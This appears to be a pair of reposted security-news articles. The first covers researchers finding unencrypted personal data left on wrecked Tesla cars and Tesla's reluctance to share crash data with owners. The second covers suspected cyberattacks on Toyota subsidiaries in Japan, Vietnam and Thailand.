Leaving data unencrypted on a car that’s headed to the junkyard isn’t exactly consistent with how tight-fisted Tesla is with privacy under other circumstances. Tesla drivers involved in car crashes say that they’ve had to wrestle to get data upon request, particularly when they don’t see eye-to-eye with Tesla about whether the crash was due to driver error or defective technology, as Consumer Affairs reported last year.

In January 2018, three people complained that their Tesla Model S surged on its own as they were about to park. A Tesla rep refused to give one of those people a computer-generated report, one driver said, in spite of the gobs of data that Tesla collects.

Consumer Affairs quoted a report from a Miami Beach couple whose inquiries for data from their car’s computer was rebuffed by Tesla, who told them to go get a subpoena if they wanted the data:

They advised that the throttle went suddenly from 2% to 97%, and then the brake was applied, but when I asked for more details about the approach to the parking space, for a copy of the report they said they would not provide it without a subpoena.

Tesla has used the “get a lawyer” approach in previous cases of people wanting to see their cars’ computer data. When Consumer Affairs asked the company why Tesla would force drivers to file for a subpoena to get at their own data, a spokesperson said it has to do with keeping the data private… apparently, even from the customers themselves. Here, they referred to the company’s customer privacy policy:

We handle all customer data in accordance with our Owner’s Manual and privacy policy, which clearly outlines the type of data we collect and the lengths that we go to protect a customers’ privacy in the process.

The company also directs customers to fork over $995 to a third-party vendor called Crash Data Group, which sells cables that might – there’s no guarantee – capture the data associated with an event in question.

An expensive hoop to jump through, that, and one that would seem superfluous, given that Tesla engineers apparently already have computer data concerning crash causes. From Consumer Affairs:

Tesla engineers have given consumers… the impression that they already have extensive data, not just about the crash itself but about the actions that drivers took leading up to the crash.

According to GreenTheOnly’s research, that data stays on the Tesla Model S, Model X or Model 3: it’s not automatically erased when a car is hauled away from a crash site or auctioned off.

A former employee of Manheim – an automotive auction company that Tesla sometimes hires to inspect, recondition and sell used cars – told CNBC that employees don’t do a factory reset on the cars’ computers.

In one instance late last year, GreenTheOnly and fellow white hat hacker Theo – who’s repaired hundreds of wrecked Teslas – bought a totaled white Model 3. It had been owned by a construction company somewhere around Boston and had been used by various employees, the researchers discerned. In fact, they found that the car’s computers had stored data from at least 17 different devices, none of it encrypted.

Mobile phones or tablets had paired to the car around 170 times. The Model 3 held 11 phonebooks’ worth of contact information from drivers or passengers who had paired their devices, and calendar entries with descriptions of planned appointments, and e-mail addresses of those invited.

The data also showed the drivers’ last 73 navigation locations including residential addresses, the Wequassett Resort and Golf Club, and local Chik-Fil-A and Home Depot locations.

The wrecked car’s computer still contained footage from one of the Model 3’s seven cameras, including the forward-facing view of the wreck that totaled the car, plus a clip of a previous, less serious side rail scrape.

Leaving personal data on cars is generally associated with rental cars. As CNBC points out, the Federal Trade Commission (FTC) has repeatedly warned drivers about pairing their devices to rental cars and has urged them to learn how to wipe their cars’ systems clean before returning a rental or selling a car.

The Verge points out that rentals don’t collect nearly as much data as cars that are driven for longer periods by those who own them. Plus, the data they collect is growing ever more granular, given the growing number of sensors and computers they’re outfitted with.

It’s not too late to wipe it, wipe it good

As one security researcher noted, for better or worse, the car manufacturers are putting the onus for data wiping on consumers. The Verge quoted Ashkan Soltani, a security researcher and former chief technologist for the FTC:

I do think automakers should be taking steps to make sure that information isn’t available to unauthorized access (secondary owners or used car dealerships, for example). Location and contacts are incredibly personal and sensitive, [and] I think it’s problematic to leave that information laying around. Specially given that unlike mobile phones, cars typically stay in circulation for decades.

We’ve got to treat these cars as computers on wheels and start wiping them before we sell them, as well as after they’re banged up, sitting in junkyards – even if their screens are shattered.

If we don’t do it, it sounds like nobody else will.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/4dSVkzWxvGo/

Possible Toyota data breach affecting 3.1 million customers

Several Toyota companies have announced that they might have suffered data breach attempts, with one affecting 3.1 million Toyota and Lexus customers.

In a brief account describing the most significant of these, the Japanese parent company said that on 21 March attackers gained “unauthorized access on the network” which led them to customer data belonging to eight sales subsidiaries in the country.

Toyota said it is still investigating what data might have been breached, or even whether any data has been breached:

We have not confirmed the fact that customer information has been leaked at this time, but we will continue to conduct detailed surveys, placing top priority on customer safety and security.

So far, it has at least managed to establish that…

…The information that may have been leaked this time does not include information on credit cards.

Clearly, the company isn’t taking any chances and has decided to tell its customers something now rather than sitting on bad news.

Normally a data breach affecting Japanese Toyota subsidiaries wouldn’t get that much attention if it weren’t for the fact that it fits a larger pattern of attacks against the company.

A day after Toyota announced the Japanese breach, its subsidiaries in Vietnam and Thailand made separate statements about suspected attacks. Toyota Vietnam posted the following on its website:

Toyota Motor Vietnam has come to be aware of a possibility that the company was targeted by a cyberattack and that some of its customer data may have been potentially accessed.

These statements echo the uncertainty of the Japanese announcement about what, if anything, the attackers were able to access.

In February, meanwhile, Toyota Australia said it had been targeted by attackers in an “attempted” cyberattack that was not successful in stealing data despite disrupting parts delivery and some other systems.

At least one security analysis has connected these attacks to a single entity, dubbed APT32 (OceanLotus Group), the latest in a line of highly targeted incidents against automotive industries and other sectors dating back to 2013.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/9iXNWSNtJwc/